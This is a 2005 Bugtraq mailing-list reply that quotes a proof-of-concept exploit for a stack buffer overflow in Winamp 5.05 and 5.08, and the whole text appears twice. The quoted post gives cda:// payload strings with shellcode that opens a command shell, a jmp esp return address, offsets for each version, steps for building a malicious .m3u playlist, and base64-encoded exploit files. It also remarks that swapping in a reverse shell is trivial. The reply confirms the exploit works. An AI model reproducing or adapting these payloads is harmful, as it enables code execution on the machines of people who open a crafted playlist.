In-Reply-To: <20050128190411.10755.qmail (at) mail2.securityfocus (dot) com [email concealed]>
Hello!
I have analyzed the vulnerability myself and the information you've given is correct. There are two things though that need mentioning.
1. You have given an address where 'jmp esp' command resides. I don't know why, yet, but this address on my computer is 0x5F20546E, so as you can see it's +0x70000 of your address.
2. The arbitrary code which gets executed must be very short, about 210 bytes, because the rest of memory after this length gets overwritten by unknown data.
The vulnerability is exploitable though. If anyone has any ideas, please contact me.
Regards,
Black Dot
>Received: (qmail 26454 invoked from network); 28 Jan 2005 19:29:12 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
> by mail.securityfocus.com with SMTP; 28 Jan 2005 19:29:12 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
> by outgoing3.securityfocus.com (Postfix) with QMQP
> id 271F22370BF; Fri, 28 Jan 2005 12:09:43 -0700 (MST)
>Mailing-List: contact bugtraq-help (at) securityfocus (dot) com [email concealed]; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq (at) securityfocus (dot) com [email concealed]>
>List-Help: <mailto:bugtraq-help (at) securityfocus (dot) com [email concealed]>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe (at) securityfocus (dot) com [email concealed]>
>List-Subscribe: <mailto:bugtraq-subscribe (at) securityfocus (dot) com [email concealed]>
>Delivered-To: mailing list bugtraq (at) securityfocus (dot) com [email concealed]
>Delivered-To: moderator for bugtraq (at) securityfocus (dot) com [email concealed]
>Received: (qmail 26723 invoked from network); 28 Jan 2005 11:58:45 -0000
>Message-ID: <20050128190411.10755.qmail (at) mail2.securityfocus (dot) com [email concealed]>
>Date: Fri, 28 Jan 2005 20:11:9 +0100
>From: "Rojodos" <rojo2_bugtraq (at) yahoo (dot) es [email concealed]>
>To: bugtraq (at) securityfocus (dot) com [email concealed] <bugtraq (at) securityfocus (dot) com [email concealed]>
>Subject: Winamp Exploit (POC) 5.08 Stack Overflow
>X-mailer: Foxmail 4.1 [eg]
>Mime-Version: 1.0
>Content-Type: multipart/mixed;
> boundary="=====000_Dragon280534826565_====="
>
>This is a multi-part message in MIME format.
>
>--=====000_Dragon280534826565_=====
>Content-Type: text/plain;
> charset="us-ascii"
>Content-Transfer-Encoding: quoted-printable
>
>Hello :)
>
>I=B4ve coded an exploit about this vulnerability, using the=
> advisory "NSFOCUS SA2005-01 : Buffer Overflow in WinAMP=
> in_cdda.dll CDA Device Name" as a guide. The advisory is very=
> good, so it=B4s very easy to code the exploit.
>
>This code:
>
>cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT=
> _IJJJ=8B=E53=FFW=83=EC=04=C6E=F8c=C6E=F9m=C6E=FAd=C6E=FB.=C6E=FCe=C6E=FD
x=C6E=FEe=B8D=80=BFwP=8D]=F8S=FF=D0
>
>Should spawn a shell in a WinXP SP1 with Winamp 5.08, I have used=
> as offset 0x5f20546e olepro32.dll, a "jmp esp" (nT _)
>
>=8B=E53=FFW=83=EC=04=C6E=F8c=C6E=F9m=C6E=FAd=C6E=FB.=C6E=FCe=C6E=FDx=C6
E=FEe=B8D=80=BFwP=8D]=F8S=FF=D0 is the scode in=
> "printable" chars.
>
>I wrote the scode sometime ago, in http://foro.elhacker.net Its a=
> very very simple scode, with hardcoded system() call (i=B4m a=
> noob, sorry xD)
>
>I have used AAAABBBBCCCC... to see how big is the buffer, and to=
> see where the ret is overflowed (in 5.08 exactly in HIII)
>
>In Winamp 5.05 works the same code, but the ret is "IIII", so the=
> exploit must have another "H":
>
> cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHnT=
> _IJJJ=8B=E53=FFW=83=EC=04=C6E=F8c=C6E=F9m=C6E=FAd=C6E=FB.=C6E=FCe=C6E=FD
x=C6E=FEe=B8D=80=BFwP=8D]=F8S=FF=D0
>
>Then, the exploit works fine in Winamp 5.05 and spawns a shell=
> :)
>
>I have only tested it in 5.08 and 5.05, but I think that its easy=
> to "port" the exploit to another version.
>
>These codes can be saved in a archive type m3u (playlist archive=
> Winamp)
>
>If you copy these codes in a text archive like this (Winamp=
> 5.08):
>
>#EXTM3U
>#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro
>cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT=
> _IJJJ=8B=E53=FFW=83=EC=04=C6E=F8c=C6E=F9m=C6E=FAd=C6E=FB.=C6E=FCe=C6E=FD
x=C6E=FEe=B8D=80=BFwP=8D]=F8S=FF=D0
>
>(for example, i have used the "demo" archive, DJ Mike Llama and=
> edit the PLAY LIST ENTRY)
>
>And save as *.m3u file, if you open this (in this case, I repeat,=
> with Winamp 5.08), a cmd shell will appear :)
>
>It=B4s trivial to change the shellcode to make a bindport, reverse=
> shell, etc..
>
>I atach two exploits, one for Winamp 5.08 and the other for=
> Winamp 5.05 (the are only de special m3u files)
>
>Sorry about my bad english, I=B4m spanish :) (Spain=
> exists :D)
>
>Greets to http://www.elhacker.net and http://foro.elhacker.net=
> and all the people I know, especially "her" (Isthar) :)
>
>THE REAL ELHACKER.NET! :D
>
>Best regards.
>
>Rojodos
>
>rojo2_bugtraq (at) yahoo (dot) es [email concealed]
>2005-01-28
>
>--=====000_Dragon280534826565_=====
>Content-Type: application/octet-stream;
> name="exploit_Winamp-5.05.m3u"
>Content-Transfer-Encoding: base64
>Content-Disposition: attachment;
> filename="exploit_Winamp-5.05.m3u"
>
>I0VYVE0zVQ0KI0VYVElORjo1LERKIE1pa2UgTGxhbWEgLSBMbGFtYSBXaGlwcGluJyBJbnR
ybw0K
>Y2RhOi8vQUFBQUJCQkJDQ0NDREREREVFRUVGRkZGR0dHR0hISEhuVCBfSUpKSovlM/9Xg+w
ExkX4
>Y8ZF+W3GRfpkxkX7LsZF/GXGRf14xkX+ZbhEgL93UI1d+FP/0A0K
>
>--=====000_Dragon280534826565_=====
>Content-Type: application/octet-stream;
> name="exploit_Winamp-5.08.m3u"
>Content-Transfer-Encoding: base64
>Content-Disposition: attachment;
> filename="exploit_Winamp-5.08.m3u"
>
>I0VYVE0zVQ0KI0VYVElORjo1LERKIE1pa2UgTGxhbWEgLSBMbGFtYSBXaGlwcGluJyBJbnR
ybw0K
>Y2RhOi8vQUFBQUJCQkJDQ0NDREREREVFRUVGRkZGR0dHR0hISG5UIF9JSkpKi+Uz/1eD7AT
GRfhj
>xkX5bcZF+mTGRfsuxkX8ZcZF/XjGRf5luESAv3dQjV34U//QDQo=
>
>--=====000_Dragon280534826565_=====--
>
>
>
Hello!
I have analyzed the vulnerability myself and the information you've given is correct. There are two things though that need mentioning.
1. You have given an address where 'jmp esp' command resides. I don't know why, yet, but this address on my computer is 0x5F20546E, so as you can see it's +0x70000 of your address.
2. The arbitrary code which gets executed must be very short, about 210 bytes, because the rest of memory after this length gets overwritten by unknown data.
The vulnerability is exploitable though. If anyone has any ideas, please contact me.
Regards,
Black Dot
>Received: (qmail 26454 invoked from network); 28 Jan 2005 19:29:12 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
> by mail.securityfocus.com with SMTP; 28 Jan 2005 19:29:12 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
> by outgoing3.securityfocus.com (Postfix) with QMQP
> id 271F22370BF; Fri, 28 Jan 2005 12:09:43 -0700 (MST)
>Mailing-List: contact bugtraq-help (at) securityfocus (dot) com [email concealed]; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq (at) securityfocus (dot) com [email concealed]>
>List-Help: <mailto:bugtraq-help (at) securityfocus (dot) com [email concealed]>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe (at) securityfocus (dot) com [email concealed]>
>List-Subscribe: <mailto:bugtraq-subscribe (at) securityfocus (dot) com [email concealed]>
>Delivered-To: mailing list bugtraq (at) securityfocus (dot) com [email concealed]
>Delivered-To: moderator for bugtraq (at) securityfocus (dot) com [email concealed]
>Received: (qmail 26723 invoked from network); 28 Jan 2005 11:58:45 -0000
>Message-ID: <20050128190411.10755.qmail (at) mail2.securityfocus (dot) com [email concealed]>
>Date: Fri, 28 Jan 2005 20:11:9 +0100
>From: "Rojodos" <rojo2_bugtraq (at) yahoo (dot) es [email concealed]>
>To: bugtraq (at) securityfocus (dot) com [email concealed] <bugtraq (at) securityfocus (dot) com [email concealed]>
>Subject: Winamp Exploit (POC) 5.08 Stack Overflow
>X-mailer: Foxmail 4.1 [eg]
>Mime-Version: 1.0
>Content-Type: multipart/mixed;
> boundary="=====000_Dragon280534826565_====="
>
>This is a multi-part message in MIME format.
>
>--=====000_Dragon280534826565_=====
>Content-Type: text/plain;
> charset="us-ascii"
>Content-Transfer-Encoding: quoted-printable
>
>Hello :)
>
>I=B4ve coded an exploit about this vulnerability, using the=
> advisory "NSFOCUS SA2005-01 : Buffer Overflow in WinAMP=
> in_cdda.dll CDA Device Name" as a guide. The advisory is very=
> good, so it=B4s very easy to code the exploit.
>
>This code:
>
>cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT=
> _IJJJ=8B=E53=FFW=83=EC=04=C6E=F8c=C6E=F9m=C6E=FAd=C6E=FB.=C6E=FCe=C6E=FD
x=C6E=FEe=B8D=80=BFwP=8D]=F8S=FF=D0
>
>Should spawn a shell in a WinXP SP1 with Winamp 5.08, I have used=
> as offset 0x5f20546e olepro32.dll, a "jmp esp" (nT _)
>
>=8B=E53=FFW=83=EC=04=C6E=F8c=C6E=F9m=C6E=FAd=C6E=FB.=C6E=FCe=C6E=FDx=C6
E=FEe=B8D=80=BFwP=8D]=F8S=FF=D0 is the scode in=
> "printable" chars.
>
>I wrote the scode sometime ago, in http://foro.elhacker.net Its a=
> very very simple scode, with hardcoded system() call (i=B4m a=
> noob, sorry xD)
>
>I have used AAAABBBBCCCC... to see how big is the buffer, and to=
> see where the ret is overflowed (in 5.08 exactly in HIII)
>
>In Winamp 5.05 works the same code, but the ret is "IIII", so the=
> exploit must have another "H":
>
> cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHnT=
> _IJJJ=8B=E53=FFW=83=EC=04=C6E=F8c=C6E=F9m=C6E=FAd=C6E=FB.=C6E=FCe=C6E=FD
x=C6E=FEe=B8D=80=BFwP=8D]=F8S=FF=D0
>
>Then, the exploit works fine in Winamp 5.05 and spawns a shell=
> :)
>
>I have only tested it in 5.08 and 5.05, but I think that its easy=
> to "port" the exploit to another version.
>
>These codes can be saved in a archive type m3u (playlist archive=
> Winamp)
>
>If you copy these codes in a text archive like this (Winamp=
> 5.08):
>
>#EXTM3U
>#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro
>cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT=
> _IJJJ=8B=E53=FFW=83=EC=04=C6E=F8c=C6E=F9m=C6E=FAd=C6E=FB.=C6E=FCe=C6E=FD
x=C6E=FEe=B8D=80=BFwP=8D]=F8S=FF=D0
>
>(for example, i have used the "demo" archive, DJ Mike Llama and=
> edit the PLAY LIST ENTRY)
>
>And save as *.m3u file, if you open this (in this case, I repeat,=
> with Winamp 5.08), a cmd shell will appear :)
>
>It=B4s trivial to change the shellcode to make a bindport, reverse=
> shell, etc..
>
>I atach two exploits, one for Winamp 5.08 and the other for=
> Winamp 5.05 (the are only de special m3u files)
>
>Sorry about my bad english, I=B4m spanish :) (Spain=
> exists :D)
>
>Greets to http://www.elhacker.net and http://foro.elhacker.net=
> and all the people I know, especially "her" (Isthar) :)
>
>THE REAL ELHACKER.NET! :D
>
>Best regards.
>
>Rojodos
>
>rojo2_bugtraq (at) yahoo (dot) es [email concealed]
>2005-01-28
>
>--=====000_Dragon280534826565_=====
>Content-Type: application/octet-stream;
> name="exploit_Winamp-5.05.m3u"
>Content-Transfer-Encoding: base64
>Content-Disposition: attachment;
> filename="exploit_Winamp-5.05.m3u"
>
>I0VYVE0zVQ0KI0VYVElORjo1LERKIE1pa2UgTGxhbWEgLSBMbGFtYSBXaGlwcGluJyBJbnR
ybw0K
>Y2RhOi8vQUFBQUJCQkJDQ0NDREREREVFRUVGRkZGR0dHR0hISEhuVCBfSUpKSovlM/9Xg+w
ExkX4
>Y8ZF+W3GRfpkxkX7LsZF/GXGRf14xkX+ZbhEgL93UI1d+FP/0A0K
>
>--=====000_Dragon280534826565_=====
>Content-Type: application/octet-stream;
> name="exploit_Winamp-5.08.m3u"
>Content-Transfer-Encoding: base64
>Content-Disposition: attachment;
> filename="exploit_Winamp-5.08.m3u"
>
>I0VYVE0zVQ0KI0VYVElORjo1LERKIE1pa2UgTGxhbWEgLSBMbGFtYSBXaGlwcGluJyBJbnR
ybw0K
>Y2RhOi8vQUFBQUJCQkJDQ0NDREREREVFRUVGRkZGR0dHR0hISG5UIF9JSkpKi+Uz/1eD7AT
GRfhj
>xkX5bcZF+mTGRfsuxkX8ZcZF/XjGRf5luESAv3dQjV34U//QDQo=
>
>--=====000_Dragon280534826565_=====--
>
>
>
[ reply ]